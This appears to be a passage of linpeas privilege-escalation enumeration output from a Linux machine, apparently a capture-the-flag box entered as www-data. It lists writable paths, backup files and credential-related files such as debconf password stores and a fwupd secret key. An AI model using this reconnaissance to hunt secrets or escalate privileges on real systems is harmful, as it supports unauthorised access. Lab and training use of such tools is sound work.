-rw-r--r-- 1 root root 220 Feb 25  2020 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 0 Feb  4 07:06 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 0 Jul 28  2021 /usr/share/php/.lock
-rw-r--r-- 1 landscape landscape 0 Feb 23  2022 /var/lib/landscape/.cleanup.user

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)                                                                                                                   
-rwxr-xr-x 1 www-data www-data 828098 Jan 29 04:28 /tmp/linpeas.sh                                                                                                     
-r-xr-xr-- 1 smorton smorton 19024 Feb  4 15:37 /tmp/binary
-rw-r--r-- 1 root root 172 Aug 27 21:28 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 4023 Aug 27 21:28 /var/backups/apt.extended_states.4.gz
-rw-r--r-- 1 root root 161 Aug 27 21:28 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 139 Aug 27 08:18 /var/backups/dpkg.diversions.1.gz
-rw-r--r-- 1 root root 268 Aug 27 08:18 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 628155 Aug 27 21:28 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 40394 Jan 16 12:21 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 4477 Jan  6 09:30 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 162324 Aug 27 21:28 /var/backups/dpkg.status.2.gz
-rw-r--r-- 1 root root 4450 Jan  5 16:20 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 161 Aug 27 21:28 /var/backups/dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 162324 Aug 27 21:28 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 139 Aug 27 08:18 /var/backups/dpkg.diversions.2.gz
-rw-r--r-- 1 root root 51200 Aug 28 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 4032 Jan  4 14:01 /var/backups/apt.extended_states.3.gz

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)                                                                                                                                                     
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                      
/dev/mqueue                                                                                                                                                            
/dev/shm
/run/lock
/run/lock/apache2
/run/php
/run/screen
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory

/usr/local/investigation/analysed_log
/var/cache/apache2/mod_cache_disk
/var/crash
/var/lib/php/sessions
/var/tmp
/var/www

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                      
  Group www-data:                                                                                                                                                      
/usr/local/investigation/analysed_log                                                                                                                                  

╔══════════╣ Searching passwords in history files
<li>Fixed shared-write permission problem with -@ argfile when using -stay_open                                                                                        
    with the -sep option when using the advanced-formatting "@" feature
<li>Added "#[CSTR]" feature to -@ argfile
<li>Documented new advanced-formatting "@" feature which has existed since
<li>Patched tests to avoid failures with Perl 5.25.11 due to missing "." in @INC
    treatment of @ARGV elements
<li>Minor change to parsing of -@ argfile (comment lines may may no longer have
<li>No longer trim trailing spaces from arguments in -@ argfiles
<li>Added -password option for processing password-protected PDF documents
    <li>Added <a href="ExifTool.html#Password">Password option</a>
<li>Improved -@ option to allow a UTF-8 BOM at the start of the input file
<li>Changed -@ to insert arguments at the current position in the command line
<li>Fixed bug introduced in 5.99 which broke the "-tagsFromFile @" feature
<li>Fixed problem which generated warnings about symbol "@indent" in Nikon.pm
    expanded beyond its "Image" roots!)
<li>Assume '-TagsFromFile @' for any redirected tags (eg. '-SRCTAG&gt;DSTTAG' or
<li>Ignore white space around '=' sign of arguments in '-@' file
<li>Fixed problem with new '-tagsFromFile @' feature which occurred when
<li>Allow target file to be specified by '@' with -TagsFromFile option
<li>Added -@ option and two utility files (iptc2xmp.args and xmp2iptc.args) to

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password                                                                                                                                             
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/include/php/20190902/ext/standard/php_password.h
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py                                                                                                                                                                
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)There are more creds/passwds files in the previous parent folder

/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords
/var/lib/fwupd/pki/secret.key
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                                                                                                       
╔══════════╣ Searching passwords inside logs (limit 70)
                                                                                                                                                                       


                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠═══════════════════════════════                                                                                      ═                                                                                                                                                                      
                                ╚════════════════╝                                                                                                                     
Regexes to search for API keys aren't activated, use param '-r'
